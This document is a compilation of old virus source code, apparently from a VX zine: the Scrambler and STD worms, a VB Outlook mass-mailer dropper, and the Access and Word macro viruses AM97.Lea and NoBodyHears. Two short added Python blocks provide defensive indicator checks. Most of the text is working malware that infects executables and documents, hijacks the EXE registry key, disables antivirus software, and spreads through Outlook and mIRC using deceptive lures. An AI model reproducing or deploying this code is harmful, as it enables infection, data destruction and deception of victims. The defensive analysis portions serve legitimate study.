scrambler = fopen("c:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}
scrambler = fopen("d:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("d:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("e:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("e:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("f:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("f:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

strcpy(RepairHost, Buffer);
strcat(RepairHost, "\\system\\hostfile.exe");
CopyOrig(Virus, RepairHost);

strcpy(ScramFile, Buffer);
strcat(ScramFile, "\\system\\scram.sys");
if(FileExists(ScramFile) == false)
HDDSearch("c:");

strcpy(WinScript, Buffer);
strcat(WinScript, "\\wscript.exe");

if(FileExists(WinScript))
{
if(FileExists("scram.sys") == false)
{
scrambler = fopen("scrambler.vbs","wt");
if(scrambler)
{
fprintf(scrambler,"On Error Resume Next\n");
fprintf(scrambler,"Dim scrambler, Mail, Counter, A, B, C, D, E, F\n");
fprintf(scrambler,"Set scrambler = CreateObject(%coutlook.application%c)\n", 34, 34);
fprintf(scrambler,"Set Mail = scrambler.GetNameSpace(%cMAPI%c)\n", 34, 34);
fprintf(scrambler,"For A = 1 To Mail.AddressLists.Count\n");
fprintf(scrambler,"Set B = Mail.AddressLists(A)\n");
fprintf(scrambler,"Counter = 1\n");
fprintf(scrambler,"Set C = scrambler.CreateItem(0)\n");
fprintf(scrambler,"For D = 1 To B.AddressEntries.Count\n");
fprintf(scrambler,"E = B.AddressEntries(Counter)\n");
fprintf(scrambler,"C.Recipients.Add E\n");
fprintf(scrambler,"Counter = Counter + 1\n");
fprintf(scrambler,"If Counter > 90 Then Exit For\n");
fprintf(scrambler,"Next\n");
fprintf(scrambler,"C.Subject = %cCheck this out, it's funny!%c\n", 34, 34);
fprintf(scrambler,"C.Attachments.Add %c%s%csystem%c%s%c\n", 34, Buffer, 92, 92, CopyName, 34);
fprintf(scrambler,"C.DeleteAfterSubmit = True\n");
fprintf(scrambler,"C.Send\n");
fprintf(scrambler,"E = %c%c\n", 34, 34);
fprintf(scrambler,"Next\n");
fprintf(scrambler,"Set F = CreateObject(%cScripting.FileSystemObject%c)\n", 34, 34);
fprintf(scrambler,"F.DeleteFile Wscript.ScriptFullName\n");
fclose(scrambler);
}
ShellExecute(NULL, "open", "scrambler.vbs", NULL, NULL, SW_SHOWNORMAL);
}
}

_chdir(Buffer);
scrambler = fopen("winstart.bat", "wt");
if(scrambler)
{
fprintf(scrambler,"@cls\n");
fprintf(scrambler,"@echo Today..\n");
fprintf(scrambler,"@echo I'm going to scramble your mind..\n");
}
fclose(scrambler);

scrambler = fopen(ScramFile, "wt");
if(scrambler)
{
fprintf(scrambler, "Scrambler\n");
fprintf(scrambler, "by Gigabyte\n");
fclose(scrambler);
}

_chdir("system");

if(FileExists(RepairHost))
WinExec(RepairHost, SW_SHOWNORMAL);

_unlink("hostfile.exe");
}
Attribute VB_Name = "STD"
'STD v1.0 by Error of Team Necrosis
' Commented by Error, pardon my commenting style
' ********W32.HLLP.STD.worm Source*********
' STD is a Memory-Resident EXE prepender with
' Worm functions for Outlook and mIRC
Public myDNA, myRNA, MyCode, STD, Grime, MySTD As String
Public FDateTime, oldDate, FDate, OldTime, FTime As String
Const MySize = 17920
Const RSP_SIMPLE_SERVICE = 1
Const RSP_UNREGISTER_SERVICE = 0
Private iResult, hProg, idprog, iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const Notification = "Hey, sorry I haven't written to you in a while. " & _
"Well you could call it a while. I'm writing this E-mail " & _
"to let you know of an attachment im sending with the next mail."
Const Notify = "Here is the e-mail attachment I told you about earlier, " & _
"It's an installation program for "
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Sub Form_Load()
' I put STD into a form because if you compile
' it into a module you won't be able to choose
' what default icon STD will have, and it ends
' up with a nasty baby blue and white form.
' Which is very noticeable since STD's icon
' becomes the infected EXE's icon. I then made
' the MS-DOS Program Icon as the default icon
' NOTE: Make sure you make the form set to
' visible = false and showintaskbar = false
On Error Resume Next
Dim process As Long
process = GetCurrentProcessId()
' This gets STD's process handle so it can
' manipulate itself
Call RegisterServiceProcess(process, RSP_SIMPLE_SERVICE)
' Now STD is hidden from ALT+CTRL+DEL and
' Task Manager. This will take up kernel
' processing up to 99.9% but it will allocate
' any needed kernel processing for other
' programs and still remain hidden.
Call AIDS
' AIDS = Registry Modifications to disable
' McAfee/Norton, have STD startup on windows
' load, make STD go memory-resident, and to
' modify mIRC scripting
myDNA = App.EXEName
If Right(App.Path, 1) <> "\" Then
myRNA = App.Path & "\"
End If
' The above will get the present filename of
' STD's host which has been executed
myRNA = myRNA & myDNA & ".exe"
' ************MEMORY-RESIDENT AREA***********
If UCase(myRNA) = "C:\WINDOWS\SYSTEM\SYSTRAY_.EXE" Then
' STD places its code into the file:
' C:\WINDOWS\SYSTEM\SYSTRAY_.EXE
' This is called the Exe-Hooker (yes i said
' hooker). Whenever a exe is executed this file
' will be executed first, sending the running
' exe's full path name and parameters to this
' files commandline
STD = Command()
' Get the running exe's path name and parameters
For X = 1 To Len(STD)
strck = UCase(Mid(STD, X, 1))
Grime = Grime + strck
If Right(Grime, 5) = ".EXE " Then
' Extract the exe name from the parameters
Grime = Left(Grime, Len(Grime) - 1)
MySTD = Right$(STD, Len(STD) - X)
' Grime = full path of the running exe
' MySTD = all the exe's parameters
GoTo Trine
End If
Next X
Trine:
ff = FreeFile
' use freefiles so you don't get file i/o errors
FDateTime = FileDateTime(Grime)
' Get the files Date/Time Stamp
For w = 1 To Len(FDateTime)
Scan = Mid(FDateTime, w, 1)
If Scan = " " Then
FDate = FDate + Scan
' Extract the Time
FTime = Mid(FDateTime, w + 1, Len(FDateTime) - w)
GoTo GotStamp
End If
' Extract the Date
FDate = FDate + Scan
Next w
GotStamp:
oldDate = Date$
' Get and store the original system date
OldTime = Time$
' Get and store the original system time
Date = FDate
' Change the system Date to the files date
Time = FTime
' Change the system Time to the files time
' This will keep the file's date/time stamp
' preserved (Is this a first for a VB virus?)
Open Grime For Binary Access Read As ff
' Open the running exe
Dim Original As String
Original = Space(LOF(ff))
' set a buffer to include the entire exe file's
' contents (I've seen exe's 126 meg being stored
' as a string in VB)
Get #ff, 1, Original
' Start at the beginning of the file and get the
' entire contents of the file
If UCase(Right(Original, 3)) = "STD" Then
' After getting the contents, check to see if
' the last 3 characters in a file are "STD"
' if so, that means the file is already infected
' and the original file needs to be ran ASAP
Call Original_Jump
' Original_Jump = run the original exe
End If
Close #ff
' if the file isn't infected:
Open myRNA For Binary Access Read As #2
' open the Exe hooker file
Dim Herpes As String
Herpes = Space(MySize)
Get #2, 1, Herpes
' Get the virus from the file
Close #2
Open Grime For Binary Access Write As ff
Put #ff, 1, Herpes
' Place the virus at the beginning of the Exe
Put #ff, MySize, Original
' Right after STD, place the original Exe code
Put #ff, LOF(ff) + 3, "STD"
' Mark the file infected with "STD" as the last
' 3 characters in a file
Close #ff
Call Original_Jump
' Run the original exe
End If
' ********END OF MEMORY-RESIDENT CODE*********
InFx_SYS
' InFx_SYS starts the infection of the system
' and makes STD go resident
End Sub
Public Sub InFx_SYS()
On Error Resume Next
Kill "C:\windows\system\systray_.exe"
' Kill any non-working installations
ff = FreeFile
Open myRNA For Binary Access Read As #ff
' Open the running file
Dim MyCode As String
MyCode = Space(MySize)
Get #ff, 1, MyCode
' Extract STD from the file
Close
Open "C:\windows\system\systray_.exe" For Binary Access Write As #ff
Put #ff, 1, MyCode
' Place STD in the Exe Hooker file
Put #ff, LOF(ff) + 3, "STD"
' Mark the file infected so it wont infect
' itself
Close
FileCopy "C:\windows\system\systray_.exe", "C:\windows\system\runtray_.dll"
' copy the Exe Hooker file to another file for
' mailing purposes
Call Original_Jump
' Run the original exe
End Sub
Public Sub AIDS()
' This modifies windows registry, disables AV
' products and mIRC sending stuff
' NOTE: this is ran every exe execution as well
On Error Resume Next
w = Chr(34)
' for saving space (And lots of it)
Open "C:\ModReg.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[HKEY_CLASSES_ROOT\exefile\shell\open\command]"
Print #1, "@=" & w & "\" & w & "C:\\windows\\system\\systray_.exe\" & w & " %1 %*" & w
' Most important command of STD is above
' This forces Windows to run all exe's through
' STD's Exe Hooker file along with their
' parameters. Once windows is restarted after
' system infection, STD will go into hardened
' residency. Windows will depend on the Exe
' Hooker to run all exe's and therefore STD
' cannot be deleted in a windows session. And
' if they delete it in DOS, no exes will run
' until they rewrite the registry
Print #1,
Print #1, "[HKEY_LOCAL_MACHINE\Software\McAfee\Scan95]"
Print #1, w & "SerialNum" & w & "=" & w & "STD v1.0 by Error of TN" & w
Print #1, w & "CurrentVersionNumber" & w & "=" & w & "666" & w
Print #1, w & "DAT" & w & "=" & w & "NONE" & w
Print #1, w & "DATFile" & w & "=" & w & "-2000" & w
Print #1, w & "VirusInfoURL" & w & "=" & w & "http://www.norton.com" & w
Print #1, w & "bVShieldEnabled" & w & "=dword:00000000"
' Disable McAfee's scanner, DAT files, and
' VShield
Print #1,
Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]"
Print #1, w & "SystemTray" & w & "=" & w & "C:\\Windows\\system\\systray_.exe" & w
' Start STD on every windows startup
Close #1
If Dir("C:\mirc", vbDirectory) <> "" Then
Open "C:\mirc\script.ini" For Output As #1
' Modify script.ini for STD sending
Print #1, "[script]"
Print #1, "n0= on 1:TEXT:*sex*:#:{"
' Every time someone types in sex, sexy, etc
' in a Channel...
Print #1, "n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow and was wondering if you would like a copy. So I'm going to send you one."
' STD will message them with this...
Print #1, "n2= .copy C:\windows\system\runtray_.dll C:\windows\system\install_show.exe"
' rename the mailing file to this false name
Print #1, "n3= .dcc send $nick C:\windows\system\install_show.exe"
' and DCC send it to the person who typed in sex
' BTW 'sex' is the 2nd most common subject/word
' typed in chats (right after a/s/l)
Print #1, "n4= }"
' end the mIRC sending stuff
Close
End If
modify = Shell("regedit /s C:\ModReg.reg", vbHide)
' run the Registry modifications in a background
' process
Kill "C:\ModReg.reg"
' delete any of its traces
Kill "C:\Program Files\Norton AntiVirus\*.dat"
' delete Norton's DAT files
End Sub
Public Function IGotWyrms(Subject1 As String, Body1 As String, Optional Attachment1 As String)
On Error Resume Next
' MAPI Mailing technique got from my other virus
' W97M/Revolution
' http://teamnecrosis.20m.com/VC.html for stuff
Dim S_and_M, B_and_D, Spawnme
Set S_and_M = CreateObject("Outlook.Application")
Set B_and_D = S_and_M.GetNameSpace("MAPI")
If S_and_M = "Outlook" Then
B_and_D.Logon "Guest", "password"
For y = 1 To B_and_D.AddressLists.Count
' get # of addybooks in Outlook
Set AddyBook = B_and_D.AddressLists(y)
X = 1
Set Spawnme = S_and_M.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
peep = AddyBook.AddressEntries(X)
Spawnme.Recipients.Add peep
X = X + 1
If X > 100 Then oo = AddyBook.AddressEntries.Count
' in each Addybook send STD to the first 100 ppl
Next oo
Spawnme.Subject = Subject1
' Subject1 = "Hey" (on authorization mail) or
' "Here it is" (on Attachment mail)
Spawnme.Body = Body1
' the body varies.... see Original_Jump
If Attachment1 <> "" Then
Spawnme.Attachments.Add Attachment1
' as above
End If
Spawnme.Send
peep = ""
Next y
B_and_D.Logoff
End If
End Function
Public Sub Original_Jump()
On Error Resume Next
If Grime = "" Or Grime = Empty Then Grime = myRNA
' make sure STD gets the file to run
If Original = "" Or Original = Empty Then
Open Grime For Binary Access Read As #3
Original = LOF(3) - MySize
If Original = 0 Then End
' if the file = pure source of STD then end
Dim GetOrig As String
GetOrig = Space(Original)
Get #3, MySize, GetOrig
' get the original code of the running exe
Close #3
End If
hideit = Left(Grime, Len(Grime) - 4)
hideit = hideit & ".vxv"
Open hideit For Binary Access Write As #10
Put #10, , GetOrig
' place the code in a temporary file with the
' same exe name but ".vxv" extension
Close #10
Close
Dim idprog As Long
Date = oldDate
Time = OldTime
' Restore system date/time if needed
idprog = Shell(hideit & " " & MySTD, vbNormalFocus)
' run the original exe AND its parameters via
' running the original code from a temporary
' file
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idprog)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
' monitor the running exe from the temp file
' and have STD remain resident using 2K bytes
' of memory to run. This is what prohibits
' STD from being deleted in a Windows session
' along with windows requiring that file
Loop
Kill hideit
Kill hideit
' As soon as the program has ended delete the
' temp file (2 times to ensure deletion)
Randomize Timer
' Base random number gen on the time
RandSend = Int(Rnd(1) * 20) + 1
If RandSend = 5 Then
' NOTE: to view mail messages see the
' declarations at the top of STD's code
' STD will send itself via Outlook 1 out of 20
' exe executions upon the infected machine
Call IGotWyrms("Hey", Notification, "")
' send the authorization mail telling all users
' that the next E-mail will have an attachment
' "Social engineering at its finest" - Evul
Name "C:\windows\system\runtray_.dll" As "C:\windows\install_.exe"
' rename the mail file to a fake name
Randomize Timer
Dim Note As String
randmsg = Int(Rnd(1) * 5) + 1
If randmsg = 1 Then Note = Notify & "an adult screensaver slideshow program"
If randmsg = 2 Then Note = Notify & "an Outlook Service Release upgrade"
If randmsg = 3 Then Note = Notify & "a Microsoft Explorer Patch"
If randmsg = 4 Then Note = Notify & "a Desktop Game I got off the internet"
If randmsg = 5 Then Note = Notify & "a brand-new MP3 player and plug-ins"
Call IGotWyrms("Here it is", Note, "C:\windows\install_.exe")
' STD will send itself disguised as one of the
' above programs
Name "C:\windows\install_.exe" As "C:\windows\system\runtray_.dll"
' rename the fake exe to the original fake name
End If
End If
End
' End STD
' W32.HLLP.STD.worm by Error of Team Necrosis
' 32-bit exe infector/worm with a hint of social
' engineering
' One of the first Memory-Resident Exe infectors
' written in Visual Basic
' questions? ---> FatalError@ghostmail.com
' http://teamnecrosis.20m.com
End Sub
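Defender-side checks for the three mechanisms the Scrambler and STD listings rely on, as an added example in Python (not code from the zine, from Gigabyte or from Error): it reads a REGEDIT4 fragment for the exefile open-command hijack that STD's AIDS() writes, tests a file for STD's "STD" trailer marker and MySize prepend, and flags ON JOIN / ON TEXT handlers in a mIRC script.ini that DCC-send to $nick, the pattern both worms write. The sample .reg text and script.ini are constructed to match the listings; the file paths in them are placeholders.

```python
"""Indicator checks for the techniques in the Scrambler and STD listings above.

Added defensive example, not code from the zine or from either author. Every
string it matches on is taken from the listings: the exefile open-command
hijack written by AIDS(), the 'STD' trailer written by the prepender, and the
ON JOIN / ON TEXT handlers that both worms write into mIRC's script.ini.
"""
import re

STD_PREPEND_SIZE = 17920             # Const MySize in the STD listing
DEFAULT_EXEFILE_COMMAND = '"%1" %*'  # stock value of HKCR\exefile\shell\open\command


def _reg_unescape(s: str) -> str:
    """Undo REGEDIT4 string escaping: a backslash quotes the next character."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg_exefile_command(reg_text: str):
    """Return the default value of [HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command]
    from REGEDIT4 text, or None when that key is not present."""
    in_key = False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.lower() == "[hkey_classes_root\\exefile\\shell\\open\\command]"
        elif in_key and line.startswith("@="):
            raw = line[2:].strip()
            if len(raw) >= 2 and raw[0] == raw[-1] == '"':
                raw = raw[1:-1]
            return _reg_unescape(raw)
    return None


def exefile_command_is_hijacked(command: str) -> bool:
    """True unless the first token of the command is %1 itself.

    A stock system launches the clicked EXE directly ("%1" %*). Putting any
    other program first, as STD's 'Exe Hooker' does, routes every EXE launch
    through that program, so the check is on the first token, not the whole string.
    """
    tokens = command.strip().split()
    return not tokens or tokens[0].strip('"') != "%1"


def looks_std_infected(data: bytes) -> bool:
    """STD prepends MySize bytes of itself and writes 'STD' as the last three bytes
    of the host, so an infected file is larger than MySize and ends with the marker
    (the listing compares it case-insensitively, so this does too)."""
    return len(data) > STD_PREPEND_SIZE and data[-3:].upper() == b"STD"


# mIRC script.ini lines look like "nN=<text>"; both listings open an ON JOIN or
# ON TEXT handler and dcc-send a file to $nick from inside it.
_EVENT_RE = re.compile(r"^n\d+=\s*on\s+\S+:(join|text):", re.IGNORECASE)
_DCC_RE = re.compile(r"dcc\s+send\s+\$nick", re.IGNORECASE)
_CLOSE_RE = re.compile(r"^n\d+=\s*}")


def find_auto_dcc_handlers(script_ini: str):
    """Return (handler line, dcc line) pairs for every ON JOIN/TEXT handler that
    DCC-sends a file to $nick. A handler that only messages the user is not flagged."""
    hits, handler = [], None
    for line in script_ini.splitlines():
        s = line.strip()
        if _EVENT_RE.match(s):
            handler = s
        elif _CLOSE_RE.match(s):
            handler = None
        elif handler and _DCC_RE.search(s):
            hits.append((handler, s))
    return hits


# Constructed samples shaped like what the listings write (paths are placeholders).
SAMPLE_REG = r'''REGEDIT4

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\windows\\system\\systray_.exe\" %1 %*"
'''
SAMPLE_SCRIPT_INI = """[script]
n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
n1=/dcc send $nick C:\\WINDOWS\\system\\abcde.exe
n2=}
"""

if __name__ == "__main__":
    cmd = parse_reg_exefile_command(SAMPLE_REG)
    print("exefile command:", cmd, "hijacked:", exefile_command_is_hijacked(cmd))
    print("script.ini auto-DCC handlers:", find_auto_dcc_handlers(SAMPLE_SCRIPT_INI))
```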
Private Sub Form_Load()
If Dir("c:\windows\hop_along.exe") = "" Then ' check if already infected
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\hop_along.exe"
CreateVBS ' call the Create VBS sub
Shell "wscript.exe c:\windows\hop_along.vbs" ' Run the VBS script
CreatePKunzip ' Call the CreatePKunzip sub
LogoZip ' Call the LogoZip sub
CreateBat ' Call the CreateBat sub
Shell "c:\windows\hop_along.bat", vbHide ' Run the bat
Wait4Bat ' Run the Wait4Bat Loop till bat is completed running
FileCopy "c:\windows\logo.sys", "c:\logo.sys" 'Copy Logo file to c:\
End If
End
End Sub

Public Sub CreateVBS()
Open "c:\windows\hop_along.vbs" For Output As #1
Print #1, "Set createmail = CreateObject(" & Chr(34) & "Outlook.Application" & Chr(34) & ")"
Print #1, " If createmail <> " & Chr(34) & "" & Chr(34) & " Then"
Print #1, " Set EachMail = createmail.GetNameSpace(" & Chr(34) & "MAPI" & Chr(34) & ")"
Print #1, " For Each GetEmail In EachMail.AddressLists"
Print #1, " If GetEmail.AddressEntries.Count > 0 Then"
Print #1, " Set Eletter = createmail.CreateItem(0)"
Print #1, " For VecH = 1 To GetEmail.AddressEntries.Count"
Print #1, " Set FloP = GetEmail.AddressEntries(VecH)"
Print #1, " If VecH = 1 Then"
Print #1, " Eletter.BCC = FloP.Address"
Print #1, " Else"
Print #1, " Eletter.BCC = Eletter.BCC & " & Chr(34) & "; " & Chr(34) & " & FloP.Address"
Print #1, " End If"
Print #1, " Next"
Print #1, " Eletter.Subject = " & Chr(34) & "Look At This!!!" & Chr(34); ""
Print #1, " Eletter.Body = " & Chr(34) & "You have to see this file its so funny!" & Chr(34); ""
Print #1, " Eletter.Attachments.Add " & Chr(34) & "C:\windows\hop_along.exe" & Chr(34); ""
Print #1, " Eletter.DeleteAfterSubmit = True"
Print #1, " Eletter.Send"
Print #1, " End If"
Print #1, " Next"
Print #1, "End If"
Close #1
End Sub

Sub CreatePKunzip()
Open "c:\windows\pkunzip.dbg" For Output As #2
Print #2, "N PKUNZIP.COM"
Print #2, "RCX"
Print #2, "0ABE"
Print #2, "W"
Print #2, "Q"
Close #2
End Sub

Sub LogoZip()
Open "c:\windows\logo.dbg" For Output As #3
Print #3, "N LOGO.ZIP"
Print #3, "RCX"
Print #3, "12A8"
Print #3, "W"
Print #3, "Q"
Close #3
End Sub

Sub CreateBat()
Open "c:\windows\hop_along.bat" For Output As #4
Print #4, "del c:\windows\logo.sys"
Print #4, "del c:\logo.sys"
Print #4, "cd c:\windows\"
Print #4, "debug < c:\windows\pkunzip.dbg"
Print #4, "debug < c:\windows\logo.dbg"
Print #4, "c:\windows\pkunzip.com logo.zip"
Print #4, "exit"
Close #4
End Sub

Sub Wait4Bat()
If Dir("c:\windows\logo.sys") = "" Then Wait4Bat
End Sub
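The .dbg files the dropper above writes are DOS DEBUG scripts: N names the output file, each E line enters bytes at an offset from 0100h, RCX (followed by a hex value) sets the byte count, and W writes it. The following is an added Python example, not part of the original listing, that rebuilds such a file from its script so an analyst can recover and identify the embedded payload without running DEBUG; SAMPLE_DBG and the function names are constructed placeholders of my own.

```python
from typing import Tuple

# Constructed sample in the same layout as the .dbg scripts the dropper writes
# (N name / E offset bytes / RCX / size / W / Q). The 20 bytes are a made-up
# ZIP local-header fragment, not the payload from the listing.
SAMPLE_DBG = """N SAMPLE.ZIP
E 0100 50 4B 03 04 14 00 00 00 08 00
E 010A 00 00 00 00 00 00 00 00 00 00
RCX
0014
W
Q
"""

LOAD_BASE = 0x100  # DEBUG's default data origin (CS:0100); W writes from here


def rebuild_debug_script(text: str) -> Tuple[str, bytes]:
    """Reconstruct the file that 'debug < script' would write to disk.

    Only the subset such droppers use is handled: N (output name), E (enter
    bytes at an offset), RCX (the next line is the hex byte count used by W),
    W (write) and Q (quit). BX is assumed zero, so CX alone is the length.
    """
    name = None
    size = None
    buf = bytearray()
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    i = 0
    while i < len(lines):
        line = lines[i]
        cmd = line[0].upper()
        if cmd == "N":
            name = line[1:].strip()
        elif cmd == "E":
            fields = line[1:].split()
            off = int(fields[0], 16) - LOAD_BASE
            if off < 0:
                raise ValueError(f"E offset below {LOAD_BASE:04X}: {line}")
            data = bytes(int(b, 16) for b in fields[1:])
            end = off + len(data)
            if end > len(buf):
                buf.extend(b"\0" * (end - len(buf)))
            buf[off:end] = data
        elif line.upper() == "RCX":
            i += 1                      # the value DEBUG prompts for
            size = int(lines[i], 16)
        elif cmd in ("W", "Q"):
            pass
        else:
            raise ValueError(f"unsupported DEBUG command: {line}")
        i += 1
    if name is None or size is None:
        raise ValueError("script never names its output file or sets CX")
    if size > len(buf):
        # DEBUG would write whatever followed in memory; pad so lengths agree.
        buf.extend(b"\0" * (size - len(buf)))
    return name, bytes(buf[:size])


def classify_payload(data: bytes) -> str:
    """Cheap triage of the rebuilt bytes by magic number."""
    if data.startswith(b"PK\x03\x04"):
        return "zip archive"
    if data.startswith(b"MZ"):
        return "DOS/Windows executable (MZ)"
    if data[:1] in (b"\xe9", b"\xeb"):
        return "probable DOS .COM (starts with a jump)"
    return "unknown"


if __name__ == "__main__":
    out_name, payload = rebuild_debug_script(SAMPLE_DBG)
    print(out_name, len(payload), "bytes:", classify_payload(payload))
```

Run against a captured .dbg, the N line tells you which file name to hunt for on disk and the rebuilt bytes can be hashed or unpacked offline.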
Option Compare Database
Option Explicit
Function Lea()
'AM97.Lea.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
On Error Resume Next
CommandBars("tools").Controls("Macro").Delete
CurrentDb.Properties("AllowBypassKey") = False
CurrentDb.Properties("AllowSpecialKeys") = False
CurrentDb.Properties("AllowBreakIntoCode") = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Application.MacrovirusProtection = False
Dim FilesToGet, FilesToInfect, CodeBase As String
FilesToInfect = False
FilesToGet = Dir("*.mdb", vbNormal)
If FilesToGet <> "" Then
CodeBase = CurrentDb.Name
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acModule, "lea", "lea"
While FilesToGet <> ""
FilesToGet = Dir
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acModule, "lea", "lea"
Wend
On Error GoTo Exit_Payload
If Day(Now()) = Int(Rnd() * 3) + 1 Then
MsgBox "AM97.Lea.a", "Welcome to this place, I'll Show you everything. With arms wide open."
End If
Exit_Payload:
End If
End Function
Attribute VB_Name = "NoBodyHears"
Sub AutoClose()
'******************************************************************
'WM97 NoBodyHears
'By AngelsKitten / [NuKE]
'Greetings to Evul, Knowdeth, Jackie twoflower, Foxz
'Reptile, Duke, Raven, Deloss, Bumblebee, Masey, RAiD,
'FlyShadow, and the following groups: MVT, 29A, NVT & SLAM
'******************************************************************
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("NoBodyHears").Export "C:\VXD.dll"
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabled
End With
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("Tools").Controls(12).Delete
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
For ¢ = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(¢).Name = "NoBodyHears" Then ¶ = True
Next ¢
For ¢ = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(¢).Name = "NoBodyHears" Then Ü = True
Next ¢
If Ü = True And ¶ = False Then Set § = NormalTemplate.VBProject _
Else If Ü = False And ¶ = True Then Set § = ActiveDocument.VBProject
§.VBComponents.Import ("C:\VXD.dll")
On Error GoTo scriptoops
Open "C:\audio.vxd" For Output As #1
Print #1, "[script]"
Print #1, "n0=;NobodyHears by Angelskitten / [NuKE]"
Print #1, "n1=on 1:PART:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick C:\windows\aboutme.doc"
Print #1, "n3=}"
Print #1, "n4="
Print #1, "n5=on 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n6= /dcc send $nick C:\windows\aboutme.doc"
Print #1, "n7=}"
Print #1, "n8="
Print #1, "n9=on 1:TEXT:*infected*:#:/.ignore $nick"
Print #1, "n10=on 1:TEXT:*infected*:?:/.ignore $nick"
Print #1, "n12=on 1:TEXT:*clean*:#:/.ignore $nick"
Print #1, "n13=on 1:TEXT:*clean*:?:/.ignore $nick"
Print #1, "n14=on 1:TEXT:*script.ini*:#:/.ignore $nick"
Print #1, "n15=on 1:TEXT:*script.ini*:?:/.ignore $nick"
Print #1, "n16=on 1:TEXT:*virus*:#:/.ignore $nick"
Print #1, "n17=on 1:TEXT:*virus*:?:/.ignore $nick"
Print #1, "n18=on 1:TEXT:*worm*:#:/.ignore $nick"
Print #1, "n19=on 1:TEXT:*worm*:?:/.ignore $nick"
Print #1, "n20=on 1:TEXT:*aboutme*:#:/.ignore $nick"
Print #1, "n21=on 1:TEXT:*aboutme*:?:/.ignore $nick"
Print #1, "n22=on 1:TEXT:*aboutme.doc*:#:/.ignore $nick"
Print #1, "n23=on 1:TEXT:*aboutme.doc*:?:/.ignore $nick"
Print #1, "n24=on 1:TEXT:*doc*:#:/.ignore $nick"
Print #1, "n25=on 1:TEXT:*doc*:?:/.ignore $nick"
Print #1, "n26=on 1:TEXT:*blank*:#:/.ignore $nick"
Print #1, "n27=on 1:TEXT:*blank*:?:/.ignore $nick"
Print #1, "n28=ON 1:QUIT:#:/msg $chan I tryed to tell you, I tryed to show you. NoBodyHears"
Print #1, "n29=ON 1:connect: {"
Print #1, "n30= /run attrib +r +s +h C:\mirc\Script.ini"
Print #1, "n31=}"
Close #1
scriptoops:
On Error GoTo batoops
Open "c:\windows\WinStart.bat" For Output As #2
Print #2, "@Echo Off"
Print #2, "copy /y c:\audio.vxd c:\mirc\script.ini >nul"
Print #2, "copy /y c:\PROGRA~1\MICROS~3\TEMPLA~1\normal.dot c:\windows\aboutme.doc >nul"
Close #2
batoops:
If Day(Now()) = 12 Then
SetAttr "C:\program files\AntiViral Toolkit Pro\*.avc", vbReadOnly
Open "C:\program files\AntiViral Toolkit Pro\*.avc" For Output As #3
Print #3, "NoBodyHears"
Close #3
SetAttr "C:\program files\AntiViral Toolkit Pro\avp.set", vbReadOnly
Open "C:\program files\AntiViral Toolkit Pro\avp.set" For Output As #4
Print #4, "NoBodyHears"
Close #4
